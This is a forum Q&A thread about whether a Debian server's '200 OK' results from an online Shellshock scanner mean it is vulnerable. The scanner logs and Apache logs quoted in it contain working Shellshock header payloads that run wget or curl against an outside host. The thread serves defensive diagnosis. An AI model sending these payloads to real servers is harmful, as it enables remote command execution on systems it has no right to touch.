# ShellShock test shows wget and curl access

Tags: shell, curl, wget, http-status-code

I've fixed shellshock bug on my Debian 6 server and while testing on http://shellshock.brandonpotter.com/ I get "No Vulnerabilities Found" and that's OK but they also check other things and in the test log I get:

```
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; curl)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'curl)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/local/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; wget)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; curl)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK
...
...
...
```

"200 OK" is this ok? 200 means accesable. I've check couple other domains and some of them show also "200 OK" but other show "Error".

Can it stay like this or should I fix this? If yes, how can I do that?

Answer (score 0, accepted):

I've checked this on my site, you don't need to worry.

This site does some tests on `/`, they don't call a specific cgi-script. And this results in a 200 OK, no matter what the passed referer or user-agent are trying to exploit.

This is an example of what my apache log shows:

```
75.127.84.182 - - [22/Oct/2014:11:52:54 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-wget'" "-"
75.127.84.182 - - [22/Oct/2014:11:52:55 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-curl'" "-"
```